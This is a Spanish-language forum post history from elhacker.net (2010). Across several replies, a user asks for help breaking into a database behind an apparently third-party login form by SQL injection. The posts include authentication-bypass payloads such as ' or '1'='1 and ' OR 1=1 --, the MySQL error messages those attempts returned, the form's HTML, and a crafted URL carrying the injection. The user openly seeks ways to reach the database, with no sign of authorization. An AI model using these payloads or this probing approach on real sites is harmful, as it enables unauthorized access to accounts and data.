Cita de: kamsky en 7 Enero 2010, 15:28 PM
' or '1'='1
@kamsky una peticion con comillas múltiples de dos.... me valida, en canvio si escribo por ejemplo 1, 3 o 5 comillas me sale el error...
De todas formas gracias por la aportación
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#31
Nivel Web / Re: Ayuda con posible inyección SQL en una base de datos....
7 Enero 2010, 16:41 PM@kamsky una peticion con comillas múltiples de dos.... me valida, en canvio si escribo por ejemplo 1, 3 o 5 comillas me sale el error...
De todas formas gracias por la aportación
#32
Nivel Web / Re: Ayuda con posible inyección SQL en una base de datos....
7 Enero 2010, 14:27 PMCita de: אครรเz en 7 Enero 2010, 12:50 PM
Prueba conCitar' or 1=1 --
con espacio al final ;-P
Gracias por la idea, lo he probado con espacio y no sale ningún error, es decir no accedo a nada
Haciendo esto mismo sin el espacio... sale el error:
Código [Seleccionar]
select `con` from basdat2 where `user`='' or 1=1 --';
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1Probando esto antes de la comilla:
Código [Seleccionar]
-- '123el resultado es:
Código [Seleccionar]
select `con` from basdat2 where `user`='-- '123';
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '123'' at line 1
#33
Nivel Web / Re: Ayuda con posible inyección SQL en una base de datos....
7 Enero 2010, 11:16 AMCita de: yoyahack en 6 Enero 2010, 21:05 PMestoy de acuerdo..... pero notifico esta respuesta del servidor por si sirve de algo:
ps al parecer el error se produce al intentar poner datos invalido, no mucho se puede hacer...
Escribiendo en el usuario ' OR 1=1 // la respuesta es la siguiente:
Código [Seleccionar]
select `con` from basdat2 where `user`='' OR 1=1 //';
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '/'' at line 1Es interesante... parece que o valida el resto o hay un filtro anti-SQL-Inyection...
Alguna idea de que puede ser???
AÑADO ESTO:
Es la URL que he conseguido examinando el codigo fuente del formulario....
http://paginaweb/?user=' OR 1=1 //&contra=cualquieraaaa&Entrar!=Entrar!
http://paginaweb/?user=%27%20OR%201=1%20//&contra=cualquieraaaa&Entrar!=Entrar!
Saludos!!!
#34
Nivel Web / Re: Documentos muy interesantes sobre vulnerabilidades web de el WASC y OWASP
7 Enero 2010, 10:57 AM
Muy buen aporte
Saludos!!!
Saludos!!!
#35
Nivel Web / Re: Ayuda con posible inyección SQL en una base de datos....
6 Enero 2010, 20:09 PM
yoyahack gracias por decirmelo... no me había fijado que estaba incompleto 
Lo edito arriba. xD
Código [Seleccionar]
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
<td colspan="1" style="text-align: left;">
<form ACTION ="./" METHOD=POST>
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
<td colspan="1" style="text-align: left;">
user </td>
<td colspan="1" style="text-align: left;">
<input type=text name=user value="" size=30 MAXLENGTH=255>
</td>
</tr>
<tr>
<td colspan="1" style="text-align: left;">
contrasenya </td>
<td colspan="1" style="text-align: left;">
<input type="password" name="contra" value="" size=30
MAXLENGTH=255 >
</td>
</tr>
<tr>
<td colspan="1" style="text-align: left; width: 2%;">
<input name="Entrar!" value="Entrar!" type="submit">
</td>
</tr>
</tbody></table>
</form>
Lo edito arriba. xD
#36
Nivel Web / Ayuda con posible inyección SQL en una base de datos....
6 Enero 2010, 19:29 PM
Hola a todos!
En una web me piden el nombre de usuario y contraseña (lo típico)
I bueno.... en vez de escribir un user como por ejemplo "ron" puse una comilla '.
Total que la página web me respondió lo siguiente:
He estado mirando en el codigo fuente.... y la parte que me interesa es esta:
He hecho pruebas.... i algunos resultados han sido:
Con 'hola:
Con '<<<>>> el resultado es:
En este último resultado he comprovado que algun simbolo ">" no aparece en la respuesta... Al igual que si tengo una peticion con comillas múltiples de dos.... me valida, en canvio si escribo por ejemplo 1, 3 o 5 comillas me sale el error...
Alguien tiene tiene alguna idea para intentar acceder a la base de datos???
Gracias
EDITO: Formulario completo ^^
En una web me piden el nombre de usuario y contraseña (lo típico
)I bueno.... en vez de escribir un user como por ejemplo "ron" puse una comilla '.
Total que la página web me respondió lo siguiente:
Código [Seleccionar]
select `con` from basdat2 where `user`=''';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1He estado mirando en el codigo fuente.... y la parte que me interesa es esta:
Código [Seleccionar]
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
<td colspan="1" style="text-align: left;">
<form ACTION ="./" METHOD=POST>
<table cellpadding=0 cellspacing=0 border=0 style="width: 100%"><tbody>
<tr>
<td colspan="1" style="text-align: left;">
user </td>
<td colspan="1" style="text-align: left;">
<input type=text name=user value="" size=30 MAXLENGTH=255>
</td>
</tr>
<tr>
<td colspan="1" style="text-align: left;">
contrasenya </td>
<td colspan="1" style="text-align: left;">
<input type="password" name="contra" value="" size=30
MAXLENGTH=255 >
</td>
</tr>
<tr>
<td colspan="1" style="text-align: left; width: 2%;">
<input name="Entrar!" value="Entrar!" type="submit">
</td>
</tr>
</tbody></table>
</form>
He hecho pruebas.... i algunos resultados han sido:
Con 'hola:
Código [Seleccionar]
select `con` from basdat2 where `user`=''hola';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hola'' at line 1Con '<<<>>> el resultado es:
Código [Seleccionar]
select `con` from basdat2 where `user`=''<<<>>>';
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<>>>'' at line 1En este último resultado he comprovado que algun simbolo ">" no aparece en la respuesta... Al igual que si tengo una peticion con comillas múltiples de dos.... me valida, en canvio si escribo por ejemplo 1, 3 o 5 comillas me sale el error...
Alguien tiene tiene alguna idea para intentar acceder a la base de datos???
Gracias
EDITO: Formulario completo ^^